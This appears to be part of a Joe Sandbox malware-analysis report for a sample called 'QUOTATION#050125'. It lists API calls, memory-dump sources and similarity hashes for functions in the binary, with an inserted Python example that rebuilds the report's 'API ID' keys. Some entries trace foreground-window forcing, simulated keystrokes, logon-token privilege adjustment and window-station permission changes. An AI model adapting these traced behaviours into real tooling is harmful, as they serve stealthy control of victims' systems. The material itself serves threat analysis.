• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: File$Pointer$Write
• String ID:
• API String ID: 3847668363-0
• Opcode ID: c6e72140444c62416d439f70abcbc52c3165b01c55c944311ac3bcb7e9df70e4
• Instruction ID: b52f6716d86dd1546455406fff25c1f11cb91fe731a160b74e6ad457725360c3
• Opcode Fuzzy Hash: c6e72140444c62416d439f70abcbc52c3165b01c55c944311ac3bcb7e9df70e4
• Instruction Fuzzy Hash: D3E06576400714EFC7219F86ED4089ABBF8FFC4351710852FE955C2510D3B1AA54DFA0
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000C2DC4
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: LongNamePath
• String ID:
• API String ID: 82841172-0
• Opcode ID: 02d332c0da421b48bf0fb589910e83e5456f9ad59d0677da3677dd8a1573942f
• Instruction ID: 8eeb0c6cbfad30ec64d43f42d9a94b49a7cbd55a8abe81d4788ed978a1c7198f
• Opcode Fuzzy Hash: 02d332c0da421b48bf0fb589910e83e5456f9ad59d0677da3677dd8a1573942f
• Instruction Fuzzy Hash: 37E0C272A002246BCB20E7989C06FEA77EDDFC8790F0400B5FD09E7248DAA4ADC48690
APIs
  • Part of subcall function 000C3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000C3908
  • Part of subcall function 000CD730: GetInputState.USER32 ref: 000CD807
• SetCurrentDirectoryW.KERNEL32(?), ref: 000C2B6B
  • Part of subcall function 000C30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 000C314E
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: IconNotifyShell_$CurrentDirectoryInputState
• String ID:
• API String ID: 3667716007-0
• Opcode ID: 582133e8222730336f130ac35b3ed141bcfeab9c211d898b2a3ad3f580d01e1e
• Instruction ID: be1fc837e0f7f3d01c25b24c65a8b706fe8941f4676c93dc0b1eb71c3887bf43
• Opcode Fuzzy Hash: 582133e8222730336f130ac35b3ed141bcfeab9c211d898b2a3ad3f580d01e1e
• Instruction Fuzzy Hash: 26E0862230434516CA04BB74A856FFDB7599BD5351F40553EF142471A3DF2489CA4251
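The "API ID" under each Similarity block is the key that Joe Sandbox's function-similarity lookup works from, and the entries on this page are enough to see how it is built from the API names alone: every CamelCase word of every listed call (subcall bullets included) is counted, prefix and suffix words such as Get/Set/Rtl/Ex and the A/W suffix are dropped, and the words are emitted from most to least frequent, "$"-separated, alphabetical inside each frequency group. The following is an added example, not Joe Sandbox's own code; the rule, and the noise-word set in particular, is inferred from the IDs in this report and is stated here as an assumption, checked against six of the entries above (Shell_NotifyIconW, for instance, keeps its "Shell_" word, which is why that entry's ID begins "IconNotifyShell_").

```python
"""Reconstruct the 'API ID' shown under 'Similarity' from an entry's API names.
Added example, not Joe Sandbox code. The rule is inferred from the IDs in this
report: CamelCase words of every listed call (subcalls included) are counted,
the noise words in NOISE are dropped (an assumption that fits every entry here),
and groups go from most to least frequent, joined with '$', alphabetical
within a group."""
import re
from collections import Counter

NOISE = {"Get", "Set", "Rtl", "Ex", "A", "W"}   # assumed noise set, inferred from the page
WORD_RE = re.compile(r"[A-Z][a-z0-9_]*")          # Shell_NotifyIconW -> Shell_, Notify, Icon, W


def api_words(api):
    """CamelCase split with noise removed. All-caps runs (e.g. 'URL') would split
    letter by letter; no entry on this page exercises that case."""
    return [w for w in WORD_RE.findall(api) if w not in NOISE]


def api_id(apis):
    """Build the '$'-separated ID from a list of API names (duplicates count)."""
    counts = Counter(w for api in apis for w in api_words(api))
    groups = {}
    for word, n in counts.items():
        groups.setdefault(n, []).append(word)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


# Constructed check: API ID as printed in this report -> the calls its entry lists.
EXPECTED = {
    "Library$Load$AddressFreeProc": ["LoadLibraryA", "GetProcAddress", "FreeLibrary",
                                     "LoadLibraryExW", "LoadLibraryA", "GetProcAddress",
                                     "FreeLibrary"],
    "File$Pointer$Write": ["WriteFile", "SetFilePointerEx", "SetFilePointerEx",
                           "SetFilePointerEx"],
    "IconNotifyShell_$CurrentDirectoryInputState": ["Shell_NotifyIconW", "GetInputState",
                                                    "SetCurrentDirectoryW", "Shell_NotifyIconW"],
    "LongNamePath": ["GetLongPathNameW"],
    "AllocateHeap": ["RtlAllocateHeap"],
    "InfoParametersSystem": ["SystemParametersInfoW"],
}


def check_all():
    """Return the page IDs the rule fails to reproduce (empty when it matches)."""
    return [want for want, apis in EXPECTED.items() if api_id(apis) != want]


if __name__ == "__main__":
    for want, apis in EXPECTED.items():
        print(f"{api_id(apis):<45} {'ok' if api_id(apis) == want else 'MISMATCH'}")
```

Feeding the rule the call list of your own disassembly of a function gives an ID you can search this report for; the numeric "API String ID" next to it is a separate hash that the page does not give enough information to reproduce.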
APIs
• CreateFileW.KERNELBASE(00000000,00000000,?,00100704,?,?,00000000,?,00100704,00000000,0000000C), ref: 001003B7
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: b361be10b0e00002bae87d68e464da797d7746894510e8ec70cf6ac496f1c008
• Instruction ID: 2e89f02ddee3c7705cc33bc6bc8e645745fc4774387fc3c987b322dc5e6a8ec4
• Opcode Fuzzy Hash: b361be10b0e00002bae87d68e464da797d7746894510e8ec70cf6ac496f1c008
• Instruction Fuzzy Hash: 8CD06C3204020DFFDF029F84DD46EDA3BAAFB48714F014000BE185A020C732E861AB90
APIs
• SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 000C1CBC
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: InfoParametersSystem
• String ID:
• API String ID: 3098949447-0
• Opcode ID: b09a23bbbe24cd81e790c24804f3d509a3bf5a94f209aa1b9b9955293ddc6caa
• Instruction ID: 6786e4fb22ba81df57cf4a6fd9f2fd0cfbc65183e2e0fd3c039f356b7d2295b6
• Opcode Fuzzy Hash: b09a23bbbe24cd81e790c24804f3d509a3bf5a94f209aa1b9b9955293ddc6caa
• Instruction Fuzzy Hash: 6EC0483A380306AEF2148B90AC4AF507764A348B11F448002F619A99E392B228A0EA90
                                                                                      APIs
                                                                                        • Part of subcall function 000C5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,000C949C,?,00008000), ref: 000C5773
                                                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 001376DE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 1214770103-0
                                                                                      • Opcode ID: 58d88b0e807b8675712fff92146361db68c346f35c198477d5ade690b6382a0d
                                                                                      • Instruction ID: fa1617b39d0df1a0ff60d053e347c415da289ee41f4ef6ad5260147461743dd4
                                                                                      • Opcode Fuzzy Hash: 58d88b0e807b8675712fff92146361db68c346f35c198477d5ade690b6382a0d
                                                                                      • Instruction Fuzzy Hash: 84816F706087019FD724EF28C4A2BADB7E1AF89314F04455DF89A5B3E2DB30AD45CB92
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(?,?,00000000,001024E0), ref: 000C6266
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: cda6c1e36f29b2eb5979c1f77efea337f56944c90d238c207eb21c56970ba953
                                                                                      • Instruction ID: 2988e059855fd594bad030485a52c40cb4ad273dce196a9402d0ddb8543ca43a
                                                                                      • Opcode Fuzzy Hash: cda6c1e36f29b2eb5979c1f77efea337f56944c90d238c207eb21c56970ba953
                                                                                      • Instruction Fuzzy Hash: 52E0B675400B01CFC3714F1AE804916FBF5FFE13613204A2ED0E792660D3B158868F50
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(000001F4), ref: 00E1A381
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288643282635.0000000000E18000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E18000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_e18000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                      • Instruction ID: 241f3164a663e98a5f483df66b5b4a3a17259c3e83a6a4b2f4d1f227d570f50e
                                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                      • Instruction Fuzzy Hash: 36E0E67494120DDFDB00EFB4D5496EE7FB4EF04301F100161FD05E2280D6309D508A62
                                                                                      APIs
                                                                                        • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0015961A
                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0015965B
                                                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0015969F
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001596C9
                                                                                      • SendMessageW.USER32 ref: 001596F2
                                                                                      • GetKeyState.USER32(00000011), ref: 0015978B
                                                                                      • GetKeyState.USER32(00000009), ref: 00159798
                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001597AE
                                                                                      • GetKeyState.USER32(00000010), ref: 001597B8
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001597E9
                                                                                      • SendMessageW.USER32 ref: 00159810
                                                                                      • SendMessageW.USER32(?,00001030,?,00157E95), ref: 00159918
                                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0015992E
                                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00159941
                                                                                      • SetCapture.USER32(?), ref: 0015994A
                                                                                      • ClientToScreen.USER32(?,?), ref: 001599AF
                                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 001599BC
                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001599D6
                                                                                      • ReleaseCapture.USER32 ref: 001599E1
                                                                                      • GetCursorPos.USER32(?), ref: 00159A19
                                                                                      • ScreenToClient.USER32(?,?), ref: 00159A26
                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00159A80
                                                                                      • SendMessageW.USER32 ref: 00159AAE
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00159AEB
                                                                                      • SendMessageW.USER32 ref: 00159B1A
                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00159B3B
                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00159B4A
                                                                                      • GetCursorPos.USER32(?), ref: 00159B68
                                                                                      • ScreenToClient.USER32(?,?), ref: 00159B75
                                                                                      • GetParent.USER32(?), ref: 00159B93
                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00159BFA
                                                                                      • SendMessageW.USER32 ref: 00159C2B
                                                                                      • ClientToScreen.USER32(?,?), ref: 00159C84
                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00159CB4
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00159CDE
                                                                                      • SendMessageW.USER32 ref: 00159D01
                                                                                      • ClientToScreen.USER32(?,?), ref: 00159D4E
                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00159D82
                                                                                        • Part of subcall function 000D9944: GetWindowLongW.USER32(?,000000EB), ref: 000D9952
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00159E05
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                      • String ID: @GUI_DRAGID$F
                                                                                      • API String ID: 3429851547-4164748364
                                                                                      • Opcode ID: 070ad3fa64374542d34f7c9df8966734506f17b141a29ea78ac9a90b8da5c5f0
                                                                                      • Instruction ID: 5d1c605c6e40d2b424feef0e14b729146206454f46baa6e0fa3d669961f9f85b
                                                                                      • Opcode Fuzzy Hash: 070ad3fa64374542d34f7c9df8966734506f17b141a29ea78ac9a90b8da5c5f0
                                                                                      • Instruction Fuzzy Hash: 8A429C74204301EFDB25CF24CD44AAABBE5FF48315F10061EF9698B6A1D731A998DF92
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 001548F3
                                                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00154908
                                                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00154927
                                                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0015494B
                                                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0015495C
                                                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0015497B
                                                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 001549AE
                                                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 001549D4
                                                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00154A0F
                                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00154A56
                                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00154A7E
                                                                                      • IsMenu.USER32(?), ref: 00154A97
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00154AF2
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00154B20
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00154B94
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00154BE3
                                                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00154C82
                                                                                      • wsprintfW.USER32 ref: 00154CAE
                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00154CC9
                                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00154CF1
                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00154D13
                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00154D33
                                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00154D5A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                      • String ID: %d/%02d/%02d
                                                                                      • API String ID: 4054740463-328681919
                                                                                      • Opcode ID: 636be646defbff44c1c79631e461c173ee8a5bbabe3e59087b1b065c876b8f25
                                                                                      • Instruction ID: f6dbd103fef0e1047808425eb319563f75f11c78759474e50ea748510d39a147
                                                                                      • Opcode Fuzzy Hash: 636be646defbff44c1c79631e461c173ee8a5bbabe3e59087b1b065c876b8f25
                                                                                      • Instruction Fuzzy Hash: F712CF71600314EFEB258F68CC49FEE7BB8EB45719F10411AF926DE2A1DB749A84CB50
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 000DF998
                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0011F474
                                                                                      • IsIconic.USER32(00000000), ref: 0011F47D
                                                                                      • ShowWindow.USER32(00000000,00000009), ref: 0011F48A
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0011F494
                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0011F4AA
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0011F4B1
                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0011F4BD
                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0011F4CE
                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0011F4D6
                                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0011F4DE
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0011F4E1
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0011F4F6
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0011F501
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0011F50B
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0011F510
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0011F519
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0011F51E
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0011F528
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0011F52D
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0011F530
                                                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0011F557
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                      • String ID: Shell_TrayWnd
                                                                                      • API String ID: 4125248594-2988720461
                                                                                      • Opcode ID: fa67de7864ebb8172223bfe342b5ca3bb656711e73e407d3f3b4fb43e5ade5c5
                                                                                      • Instruction ID: b6074ddf2ee5d394851224cb2c93f1173152f61514ba9bf3f6673b8149705daf
                                                                                      • Opcode Fuzzy Hash: fa67de7864ebb8172223bfe342b5ca3bb656711e73e407d3f3b4fb43e5ade5c5
                                                                                      • Instruction Fuzzy Hash: 6D318D71B40318BEEB246FB55C4AFBF7E6DEB44B51F100069FA00EA1D1D7B05981AAA0
                                                                                      APIs
                                                                                        • Part of subcall function 001216C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0012170D
                                                                                        • Part of subcall function 001216C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0012173A
                                                                                        • Part of subcall function 001216C3: GetLastError.KERNEL32 ref: 0012174A
                                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00121286
                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 001212A8
                                                                                      • CloseHandle.KERNEL32(?), ref: 001212B9
                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001212D1
                                                                                      • GetProcessWindowStation.USER32 ref: 001212EA
                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 001212F4
                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00121310
                                                                                        • Part of subcall function 001210BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001211FC), ref: 001210D4
                                                                                        • Part of subcall function 001210BF: CloseHandle.KERNEL32(?,?,001211FC), ref: 001210E9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                      • String ID: $default$winsta0
                                                                                      • API String ID: 22674027-1027155976
                                                                                      • Opcode ID: 7eb02f70587009be54e78db93a37dbc9e113e1af1abd0cebdd20193963f02956
                                                                                      • Instruction ID: a5ec81c4a355613b55f8165e9c946ab9614473473f32ef94565e00f48ed500f4
                                                                                      • Opcode Fuzzy Hash: 7eb02f70587009be54e78db93a37dbc9e113e1af1abd0cebdd20193963f02956
                                                                                      • Instruction Fuzzy Hash: C481AD71900359BFDF20EFA4EC49BEE7BB9EF14700F144129F915A62A0D7708AA4CB60
                                                                                      APIs
                                                                                        • Part of subcall function 001210F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00121114
                                                                                        • Part of subcall function 001210F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00120B9B,?,?,?), ref: 00121120
                                                                                        • Part of subcall function 001210F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00120B9B,?,?,?), ref: 0012112F
                                                                                        • Part of subcall function 001210F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00120B9B,?,?,?), ref: 00121136
                                                                                        • Part of subcall function 001210F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0012114D
                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00120BCC
                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00120C00
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00120C17
                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00120C51
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00120C6D
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00120C84
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00120C8C
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00120C93
                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00120CB4
                                                                                      • CopySid.ADVAPI32(00000000), ref: 00120CBB
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00120CEA
                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00120D0C
                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00120D1E
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00120D45
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00120D4C
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00120D55
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00120D5C
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00120D65
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00120D6C
